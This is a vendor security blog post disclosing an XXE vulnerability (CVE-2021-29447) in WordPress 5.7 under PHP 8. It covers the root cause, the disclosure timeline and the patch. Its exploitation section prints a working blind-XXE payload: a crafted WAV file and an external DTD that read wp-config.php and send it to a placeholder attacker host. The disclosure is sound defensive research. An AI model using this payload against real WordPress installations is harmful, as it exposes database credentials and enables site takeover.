Blog post

WordPress 5.7 XXE Vulnerability

Karim El Ouerghemmi photo

Karim El Ouerghemmi

Developer

Date

  • Security
In this blog post we analyze a XXE vulnerability that our analyzers discovered in WordPress, the most popular CMS, and what PHP 8 developers can learn from it.

At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to detect more OWASP Top 10 and CWE Top 25 issue types. When testing our new analyzers against some of the most popular open-source PHP projects, an interesting issue was raised in the WordPress codebase.


WordPress is the world’s most popular content management system that is used by approximately 40% of all websites. This wide adoption makes it one of the top targets for cyber criminals. Its code is heavily reviewed by the security community and by bug bounty hunters that get paid for reporting security issues. Critical code issues rarely slip through their hands. 


In this blog post we are investigating the new vulnerability reported by our analyzer. We explain its root cause, related to PHP 8, and demonstrate how an attacker could leverage it to undermine the security of a WordPress installation. We responsibly disclosed the code vulnerability to the WordPress security team who fixed it in the latest version 5.7.1 and assigned CVE-2021-29447.


SonarQube Cloud Vulnerability Report


Impact

The detected code vulnerability is an authenticated XML External Entity (XXE) injection. It affects WordPress versions prior to 5.7.1 and can allow remote attackers to achieve:

  • Arbitrary File Disclosure: the content of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

The vulnerability can be exploited only when WordPress is running on PHP 8. Additionally, the permissions to upload media files are needed. On a standard WordPress installation this translates to having author privileges. However, combined with another vulnerability or a plugin allowing visitors to upload media files, it could be exploited with lower privileges.


WordPress released a security & maintenance update on April 14th, 2021 to patch the vulnerability and to protect its users.

WordPress 5.7 XXE Vulnerability

Technical Details

In this section we take a closer look at the technical details of the vulnerability. First we briefly revisit what an XXE vulnerability is. Following that, we dive into the vulnerability our analyzer reported in the WordPress core by looking at where it is located in the code, and why it became exploitable again in PHP 8 even though there was an effort to prevent such vulnerabilities in the affected code lines. Finally, we demonstrate how it can be exploited by attackers by using specially crafted input to extract the wp-config.php file, and how the vulnerability is prevented.

XML External Entity (XXE) Vulnerabilities

XML offers the possibility to define custom entities that can be reused throughout a document. This can, for example, be used to avoid duplication. The following code defines an entity myEntity for further usage.

<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
    <foo>&myEntity;</foo>
    <bar>&myEntity;</bar>
</myDoc>

The value of defined entities can also stem from an external source referenced by a URI. In this case, they are called external entities:

<!DOCTYPE myDoc [ <!ENTITY myExternalEntity SYSTEM "http://…..com/value.txt" > ]>
<myDoc>
    <foo>&myExternalEntity;</foo>
<myDoc>

XXE attacks misuse this feature. They are possible when a loosely configured XML parser is run on user-controlled content. Loosely configured usually means that all entities are substituted with their corresponding value in the result. For example, in the last sample, if an attacker would supply file:///var/www/wp-config.php as the URI and is able to view the result of the parsed XML, she would successfully leak sensitive file content. However, the result of parsed XML is not always displayed back to the user, which is the case for the WordPress vulnerability described in this post. As we will see later, there are ways to cope with that.


This is the main idea and mechanism behind XXE (learn more in our rule database). Besides sensitive file disclosure, XXE can also have other impacts, such as Server-Side Request Forgery (to retrieve the content of external entities, a request has to be made, S5144), and Denial of Service (entities could reference other entities resulting in a possible exponential growth during substitution a.k.a. Billion laughs attack).

XXE in WordPress

WordPress has a Media Library that enables authenticated users to upload media files that can then be used in their blog posts. To extract meta information from these media files, e.g., artist name or title, WordPress uses the getID3 library. Some of this metadata is parsed in XML form. Here, our analyzer reported a possible XXE vulnerability (line 730).

wp-includes/ID3/getid3.lib.php

723    if (PHP_VERSION_ID < 80000) {
724
725        // This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading is
726        // disabled by default, so this function is no longer needed to protect against XXE attacks.
728        $loader = libxml_disable_entity_loader(true);
729    }
730    $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

The used simplexml_load_string() function is a PHP function that parses a string passed to its first parameter as XML. It is possible to configure the underlying XML parser (PHP relies on Libxml2) with flags passed in the third argument.


The comments in the shown piece of code are of particular interest as they mention protection against XXE. Reading them while reviewing this finding of a static code analyzer might raise the suspicion that it is a false-positive, and that correct precautions have been taken to avoid the vulnerability. But, is it? (Spoiler: no)


To better understand the code and the surrounding comments, it is useful to look at its history. In 2014, an XXE vulnerability was fixed in WordPress 3.9.2. This is the main reason the call libxml_disable_entity_loader(true) was added at that point. The PHP function libxml_disable_entity_loader() configures the XML parser to disable external entity loading.


Recently, with the release of PHP 8, the code was slightly adapted to accommodate for the deprecation of the libxml_disable_entity_loader() function and call it only if the running PHP version is older than 8. This function was deprecated because newer PHP versions use Libxml2 v2.9+ which disables external entity fetching by default.


Now the subtlety in the code we are looking at is that simplexml_load_string() is not called with default configuration. Even though the name might not suggest it, the flag LIBXML_NOENT enables entity substitution. Surprisingly, NOENT in this case means that no entities will be left in the result, and thus external entities will be fetched and substituted. As a result, exploiting the XXE vulnerability that was fixed in WordPress 3.9.2 was made possible again on WordPress instances running on PHP 8.

Exploitation

To exploit the described vulnerability it is necessary to understand if and how user-controlled data can reach the point where it gets parsed as XML as part of the $XMLstring variable in:

wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
730        $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

WordPress uses getID3 to ease extraction of this metadata when files are uploaded to its media library. Investigation of the getID3 library revealed that the string being parsed at that point is the iXML chunk of a wave audio file when its metadata gets analyzed.

wp-includes/ID3/module.audio-video.riff.php

426    if (isset($thisfile_riff_WAVE['iXML'][0]['data'])) {
427        // requires functions simplexml_load_string and get_object_vars
428        if ($parsedXML = getid3_lib::XML2array($thisfile_riff_WAVE['iXML'][0]['data'])) {

WordPress does allow uploading wave audio files, and extracts their metadata with the wp_read_audio_metadata() function (which relies on getID3). Thus, by uploading a crafted wave file, malicious XML can be injected and parsed. A minimal file that has the necessary structure to be handled as wave and that contains an attack payload in the iXML chunk can be created with the following content:

RIFFXXXXWAVEBBBBiXML_OUR_PAYLOAD_

(BBBB being four bytes representing the length of the XML payload in little endian.)

Blind XXE

When an attacker injects a payload with the described strategy, the result of the parsed XML is not displayed in the user interface. Thus, to extract the content of a sensitive file (e.g., wp-config.php), the attacker must rely on a blind XXE technique (also called out-of-band XXE) to achieve this. This is similar to the technique described in our previous blog post about exploiting Shopware. The basic idea is this:

  • A first external entity (e.g., %data) is created whose value will be substituted with the content of the file.
  • Another external entity is created whose URI is set to “http://attacker_domain.com/%data;”. Note the value of the URI contains the first entity which will be substituted.
  • When resolving the second entity, the parser will make a request to “http://attacker_domain.com/_SUBSTITUTED_data”, making the content of the file visible in the logs of the web server.

To make the URI of the external entity dependent on a value of another substituted entity, we do use parameter entities and an external DTD. Furthermore, we make use of the php:// stream wrapper to compress and encode the content of the file. Putting things together, the following would lead to the extraction of the sensitive wp-config.php file:

payload.wav

RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>

(BBBB being four bytes representing the length of the XML payload in little endian.)

xxe.dtd

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

Patch

WordPress patched the vulnerability in version 5.7.1 by reintroducing the call to the libxml_disable_entity_loader() function that was deprecated in PHP 8 even for newer PHP versions. To avoid PHP deprecation warnings, the PHP error suppressing operator @ was added to the call.


wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
727      $loader = @libxml_disable_entity_loader(true);
728      $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

Another alternative to reintroducing the call to the deprecated function would have been to make use of PHP’s libxml_set_external_entity_loader() function. This is the recommended way according to the PHP documentation. It also allows more granular control over the external entity loader in case the possibility of loading specific resources is required. This is, of course, only necessary if entity substitution is really required in PHP 8.

Timeline

DateWhat
04.02.2021We report the vulnerability with PoC on Hackerone
05.02.2021WordPress acknowledges receipt of report
01.03.2021WordPress updates us about triage and a fix in progress
08.03.2021WordPress informs us about upcoming security release
14.04.2021WordPress releases version 5.7.1

Summary

In this blog post we looked at an interesting XXE vulnerability we discovered in the most popular content management system, WordPress. It allows authenticated attackers to leak sensitive files from the host server which can lead to a full compromise. We showed how this type of vulnerability works and how attackers can exploit it by using blind XXE techniques. Further, we learned about a related pitfall in PHP 8 code and how developers can prevent this type of code vulnerability in their own applications. We would like to thank the WordPress team for a great collaboration and a quick resolution with a new patch release.

  • Legal documentation
  • Trust center
  • Follow SonarSource on Twitter
  • Follow SonarSource on Linkedin

© 2008-2024 SonarSource SA. All rights reserved. SONAR, SONARSOURCE, SONARQUBE, and CLEAN AS YOU CODE are trademarks of SonarSource SA.